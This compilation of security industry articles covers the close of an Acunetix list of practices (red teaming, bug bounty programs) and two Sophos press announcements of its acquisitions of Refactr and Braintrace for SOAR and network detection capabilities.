The idea behind red teaming is to hire an external organization that continuously tries to challenge your security and to establish a local team that is in charge of stopping such attempts. There are many advantages to this approach. A continuous exercise means that your business is always prepared for an attack. It also helps with maintaining general security awareness, since the blue team involves much more than just a dedicated security team.

A dedicated red team does not just exploit security vulnerabilities. They often perform different types of mock attacks (including phishing, social engineering, DDoS attacks, and others) to help you protect against real ones. The added advantage is also the realization of how different security elements are woven together and cannot be treated separately.

7. Maintain a bounty program

Many top-notch security professionals prefer to work as freelancers instead of being hired by businesses either full-time or on a project basis. Losing out on such outstanding expertise is a huge waste. Your business can use such valuable resources by establishing a bounty program.

While some businesses may perceive a bounty program as a risky investment, it quickly pays off. It also increases the respect that your brand has in the hacking community and, consequently, the general brand perception. If you have a bounty program and treat independent security experts fairly, your brand is perceived as mature and proud of its security stance. You may strengthen such perception by publicly disclosing bounty program payoffs and responsibly sharing information about any security vulnerability discoveries and data breaches.

Source: Acunetix

Optimizing Managed Threat Response (MTR) and Extended Detection and Response (XDR) with Security Orchestration Automation and Response (SOAR) Capabilities.

“I’m excited to share that Sophos has acquired Refactr, which develops and markets a versatile DevSecOps automation platform that bridges the gap between DevOps and cybersecurity” said John Levy, Sophos Chief Technical Officer.

As DevOps and security teams continue to adopt “IT-as-Code” approaches to managing their environments, Refactr’s ability to automate any of these processes enables teams to scale. Refactr has leading customers in both the private and government/public sectors, including the Center for Internet Security, and the US Air Force’s Platform One.

Sophos is optimizing Refactr’s DevSecOps automation platform to add Security Orchestration Automation and Response (SOAR) capabilities to our Managed Threat Response (MTR) and Extended Detection and Response (XDR) solutions. The SOAR capabilities will also help automate Sophos’ Adaptive Cybersecurity Ecosystem, which underpins all of Sophos’ product solutions, services, and alliance integrations.

First-generation SOAR solutions have moved our industry forward in significant ways, but we’re now witnessing an evolution where more and more businesses are becoming software companies, and our security solutions need to evolve in parallel. As we’ve seen in recent supply-chain incidents, attackers are increasingly targeting software development pipelines, and defenders need the ability to shift further left of attackers. The industry needs SOAR to mature into more capable and generalizable DevSecOps solutions, and Sophos’ acquisition of Refactr will help us lead the way.

With Refactr, Sophos will fast track the integration of such advanced SOAR capabilities into our Adaptive Cybersecurity Ecosystem, the basis for our XDR product and MTR service. We will provide a full spectrum of automated playbooks and pipelines for our customers and partners, from drag-and-drop to fully programmable, along with broad integrations with third-party solutions through our technology alliances program to work with today’s diverse IT environments.

Sophos will continue to develop and offer Refactr’s platform to their existing and growing base of partners and organizations that want to build customized IT and security automations for themselves and for their customers. Refactr’s Community Edition will continue to be available as well.

“We created the Refactr platform so that every organization can achieve DevSecOps through holistic security-first automation. Our platform was purpose-built to be versatile, interoperable and easy to use. We are proud of what we accomplished at Refactr and excited for the next part of our journey with Sophos to help create a more secure world through DevSecOps.” Michael Fraser, CEO and co-founder, Refactr

We could not be more excited to add Refactr technologies to the Sophos portfolio and we plan to begin offering SOAR options by early 2022. In the meantime, on behalf of Sophos, I would like to extend a very warm welcome to Refactr employees, customers, and partners.

Source: Sophos

I’m thrilled to announce that Sophos has acquired Braintrace, an innovator in Network Detection and Response (NDR) technology. Braintrace’s NDR provides deep visibility into network traffic patterns, including encrypted traffic, without the need for Man-in-the-Middle (MitM) decryption.

Braintrace’s NDR technology will enhance and extend Sophos’ Managed Threat Response (MTR), Rapid Response, and Extended Detection and Response (XDR) solutions through integration into the Adaptive Cybersecurity Ecosystem, which underpins all Sophos products and services. With the integration of Braintrace, defenders will benefit from an ‘air traffic control system’ that sees all network activity, reveals unknown and unprotected assets, and exposes evasive malware more reliably than Intrusion Protection Systems (IPS).

We’re particularly excited that Braintrace built this technology specifically to provide better security outcomes to their Managed Detection and Response (MDR) customers. It’s hard to beat the effectiveness of solutions built by teams of skilled practitioners and developers to solve real world cybersecurity problems.

The Braintrace technology will also serve as the launchpad to collect and forward third-party event data from firewalls, proxies, virtual private networks (VPNs), and other sources. These additional layers of visibility and event ingestion will significantly improve threat detection, threat hunting and response to suspicious activity.

Sophos will deploy Braintrace’s NDR technology as a virtual machine, fed from traditional observability points such as a Switched Port Analyzer (SPAN) port or a network Test Access Point (TAP) to inspect both north-south traffic at boundaries or east-west traffic within networks. These deployments help discover threats inside any type of network, including those that remain encrypted, serving as a complement to the decryption capabilities of Sophos Firewall. As a virtual machine, Braintrace’s NDR technology can run both on-premises and in the cloud to protect your network.

The technology’s packet and flow engine feeds a variety of machine learning models trained to detect suspicious or malicious network patterns, such as connections to Command and Control (C2) servers, lateral movement and communications with suspicious domains. Since Braintrace built its NDR technology specifically for predictive, passive monitoring, its engine also provides intelligent network packet capture that IT security administrators and threat hunters can use as supporting evidence during investigations. The novel NDR analysis and prediction technique is patent pending.

“We built Braintrace’s NDR technology from the ground up for detection and now, with Sophos, it will fit into a complete system to provide cross-product detection and response across a multi-vendor ecosystem” said Bret Laughlin, CEO and co-founder, Braintrace.

Sophos plans to introduce Braintrace’s NDR technology for MTR and XDR in the first half of 2022. In the meantime, on behalf of Sophos, I would like to extend a warm welcome to all Braintrace customers, partners and employees.

Source: Sophos